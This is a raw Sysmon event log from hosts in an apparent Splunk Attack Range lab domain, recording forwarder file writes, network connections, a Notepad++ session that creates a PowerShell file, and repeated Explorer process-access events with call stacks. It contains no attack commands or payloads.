07:47:34.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7EB30C41A2249C0A9D27FAF609DAB3,SHA256=C49DDB8B028EAE9845431CD9D98DC595DA0691EDC2A1C988EB1076480DAC220B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:32.370{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57203-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:35.830{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8813DBDD6777FFDBECF585EF93ACCAF0,SHA256=1D7DE05A726E3B6E2F04AC34B17930427DDCD24643E0AC529348783CC8F0F54A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.553{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50955-false10.0.1.12-8000- 23542300x80000000000000001047058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:35.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2788A6E89AB00B291DCDF5F9B590438D,SHA256=3D7B1AAAF3B097EEED4E6B4D079FA46B41FD3FFF777B08B7BEB9A66D56C59CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:36.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B2420D88963E522D3630381FE0AB3A0,SHA256=25090FB3CF3E349BE1B920FDF70384857F9A84DA299C9B23C24432FD24EA3DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.447{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A35C08A32BA41E055672F01587E5D50,SHA256=7D380619E50BCAC8784C3ED2F506B3B0C6CB4DF9500360839464B1AD172F1A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.447{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAFDA50ABC01B1302C4DA78A4ED24EE,SHA256=734B2C9F297A630D1E60E453658A71409E0EC8692992744F410CBEF8091F7E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.248{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074729MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.232{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 10341000x80000000000000001047138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.201{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.185{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.185{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a6dd7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472AEEF6)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001047125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 